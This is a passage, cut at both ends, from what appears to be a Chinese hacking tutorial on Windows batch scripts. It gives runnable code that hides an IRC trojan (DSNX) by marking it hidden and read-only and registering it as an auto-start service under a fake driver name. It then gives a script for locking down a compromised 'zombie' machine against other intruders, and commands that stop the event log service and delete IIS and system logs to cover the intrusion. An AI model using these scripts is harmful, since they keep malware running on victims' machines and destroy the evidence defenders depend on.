- ·上一篇文章:如何查看、添加、修改、删除路由器内部的路由表项?
- ·下一篇文章:紧急!勒索病毒肆虐,万能数据恢复大师助力找回被删除文件
容易暴露木马程序的路径,从而导致木马被查杀,相对地若是将 木马程序注册为系统服务则相对安全一些。下面以配置好地IRC木马DSNX为例(名为windrv32.exe) @start windrv32.exe @attrib +h +r windrv32.exe @echo [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] 》》patch.dll @echo ”windsnx “=- 》》patch.dll @sc.exe create Windriversrv type= kernel start= auto displayname= WindowsDriver binpath= c:winntsystem32windrv32.exe @regedit /s patch.dll @delete patch.dll @REM [删除DSNXDE在注册表中的启动项,用sc.exe将之注册为系统关键性服务的同时将其属性设为隐藏和只读,并config为自启动] @REM 这样不是更安全^_^. 六、精彩实例放送 1、删除win2k/xp系统默认共享的批处理 --------- cut here then save as .bat or .cmd file --------- @echo preparing to delete all the default shares.when ready pres any key. @pause @echo off :Rem check parameters if null show usage. if {%1}=={} goto :Usage :Rem code start. echo. echo--------- echo. echo Now deleting all the default shares. echo. net share %1$ /delete net share %2$ /delete net share %3$ /delete net share %4$ /delete net share %5$ /delete net share %6$ /delete net share %7$ /delete net share %8$ /delete net share %9$ /delete net stop Server net start Server echo. echo All the shares have been deleteed echo. echo --------- echo. echo Now modify the registry to change the system default properties. echo. echo Now creating the registry file echo Windows Registry Editor Version 5.00》 c:delshare.reg echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceslanmanserverparameters]》》 c:delshare.reg echo ”AutoShareWks“=dword:00000000》》 c:delshare.reg echo ”AutoShareServer“=dword:00000000》》 c:delshare.reg echo Nowing using the registry file to chang the system default properties. regedit /s c:delshare.reg echo Deleting the temprotarily files. del c:delshare.reg goto :END :Usage echo. echo --------- echo. echo ☆ A example for batch file ☆ echo ☆ [Use batch file to change the sysytem share properties.] ☆ echo. echo Author:Ex4rch echo Mail:Ex4rch@hotmail.com QQ:1672602 echo. echo Error:Not enough parameters echo. echo ☆ Please enter the share disk you wanna delete ☆ echo. echo For instance,to delete the default shares: echo delshare c d e ipc admin print echo. echo If the disklable is not as C: D: E: ,Please chang it youself. echo. echo example: echo If locak disklable are C: D: E: X: Y: Z: ,you should chang the command into : echo delshare c d e x y z ipc admin print echo. echo *** you can delete nine shares once in a useing *** echo. echo --------- goto :EOF :END echo. echo --------- echo. echo OK,delshare.bat has deleted all the share you assigned. echo.Any questions ,feel free to mail toEx4rch@hotmail.com. echo echo. echo --------- echo. :EOF echo end of the batch file --------- cut here then save as .bat or .cmd file --------- 2、全面加固系统(给肉鸡打补丁)的批处理文件 --------- cut here then save as .bat or .cmd file --------- @echo Windows Registry Editor Version 5.00 》patch.dll @echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceslanmanserverparameters] 》》patch.dll @echo ”AutoShareServer“=dword:00000000 》》patch.dll @echo ”AutoShareWks“=dword:00000000 》》patch.dll @REM [禁止共享] @echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa] 》》patch.dll @echo ”restrictanonymous“=dword:00000001 》》patch.dll @REM [禁止匿名登录] @echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesNetBTParameters] 》》patch.dll @echo ”SMBDeviceEnabled“=dword:00000000 》》patch.dll @REM [禁止及文件访问和打印共享] @echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices@REMoteRegistry] 》》patch.dll @echo ”Start“=dword:00000004 》》patch.dll @echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSchedule] 》》patch.dll @echo ”Start“=dword:00000004 》》patch.dll @echo [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon] 》》patch.dll @echo ”ShutdownWithoutLogon“=”0“ 》》patch.dll @REM [禁止登录前关机] @echo ”DontDisplayLastUserName“=”1“ 》》patch.dll @REM [禁止显示前一个登录用户名称] @regedit /s patch.dll --------- cut here then save as .bat or .cmd file --------- 下面命令是清除肉鸡所有日志,禁止一些危险的服务,并修改肉鸡的terminnal service留跳后路。 @regedit /s patch.dll @net stop w3svc @net stop event log @del c:winntsystem32logfilesw3svc1*.* /f /q @del c:winntsystem32logfilesw3svc2*.* /f /q @del c:winntsystem32config*.event /f /q @del c:winntsystem32dtclog*.* /f /q @del c:winnt*.txt /f /q @del c